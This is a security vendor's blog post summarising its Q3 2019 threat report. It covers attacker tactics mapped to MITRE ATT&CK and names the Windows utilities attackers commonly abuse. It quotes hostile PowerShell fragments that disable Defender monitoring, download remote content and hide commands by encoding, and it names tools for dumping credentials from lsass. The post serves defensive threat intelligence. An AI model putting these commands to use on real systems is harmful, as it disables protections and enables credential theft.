We’ve got something exciting in store for you in this quarter’s Rapid7 Quarterly Threat Report: the MITRE ATT&CK™ framework!

That’s right, we’ve spent the last couple quarters aligning our data sources with the ATT&CK framework in hopes of gaining more insight into attacker activities and impact to the organizations we cover in the report … and IT WORKED!

Figure-3---mitre-tactics-by-industry-1

Here are a few key findings that came out of our analysis:

  1. Our MDR team is WAY above the industry average, with the majority of threats identified and remediated in under one day from detection.
  2. The majority of detections occur in the “Execution” phase on the MITRE ATT&CK™ framework.
  3. Within the “Execution” tactic, we see attackers using a ton of PowerShell and third-party software techniques.

In-Q3-of-2019-we-have-seen-a-dramatic-increase-in-PowerShell-usage-from-attackers.

We also decided to go deeper than before into the data from Rapid7’s Managed Detection and Response (MDR) team and perform analysis on that PowerShell and Windows utility usage by attackers. We uncovered some interesting trends in switch usage for malicious use of PowerShell, including:

  • “Set-MpPreference -DisableRealtimeMonitoring $true” to disable Windows protections.
  • “Net.WebClient” and “DownloadString” to fetch additional content.
  • “-EncodedCommand” to bypass real-time monitoring software and evade detection.

For the Windows utilities, below are the top 15 command line utilities used by attackers in the third quarter:

Executable Description
cmd.exe The Windows command line interpreter. Attackers use this to interact with the entire operating system.
powershell.exe The Windows scripting language interpreter. Attackers use this utility to run scripts.
ADExplorer.exe A SysInternals (now Microsoft) tool that allows you to visually explore Active Directories and their properties
rundll32.exe The Windows dynamic library loader. This is just another way to run code in Windows.
procdump64.exe A SysInternals (now Microsoft) tool that allows you to monitor processes, run debuggers, and dump process memory. Attackers use this to dump credentials from lsass.exe.
Mshta.exe A Windows utility that runs Microsoft HTML Application (.hta) files. Attackers use this utility to execute script and download remote files.
wmic.exe A Windows command interface into Windows Management Instrumentation. Attackers will use this utility to perform recon on hosts, to execute programs on local and remote systems, covert persistence, and data transfers.
mimikatz.exe A non-Microsoft application that allows attackers to gather credentials from Windows systems.
wscript.exe Another Windows scripting language. Attackers use this utility to run scripts.
Schtasks.exe A Windows utility that runs a program at a specified date and time. Attackers use this to run programs and persist on a system.
nircmdc.exe A third-party command line utility that performs actions without a user interface. We observed attackers using this utility to gather screenshots from victims.
bitsadmin.exe A Windows command line utility that performs uploads and downloads. Attackers use this to bring in tools and exfil data.
reg.exe A Windows command line utility that interfaces with the Windows registry. Attackers use this to fetch stored credentials and persist tools and malware on systems.
certutil.exe A Windows command line utility that interfaces with the certificate authority configuration. Attackers use this to download remote content and perform privilege escalation.
regsvr32.exe A Windows command line utility that allows the loading and unloading dynamic libraries. Attackers use this to run remote code and bypass security controls.

From Project Heisenberg, Rapid7’s global honeypot network, we have some visuals illustrating an increase in traffic seen targeting Microsoft SQL server, as well as continued targeting of the BlueKeep vulnerability.

Attacker activity has shown an increase in Microsoft SQL server targeting, and a continued focus on trying to exploit the BlueKeep vulnerability.

Graph showing the number of BlueKeep connections to our Heisenberg honeypot network

Last, we have some unusual DNS over TLS activity we’ve dug into:

Figure-11--Unusual-DNS-Over-TLS-Activity

If this is the kind of whodunit (well, howdunit, really) mystery writing you're interested in, you're invited to go download our latest Quarterly Threat Report and read up on the latest attacker trends, now written in ATT&CK-ese.

Read the Full 2019 Q3 Quarterly Threat Report

Get Started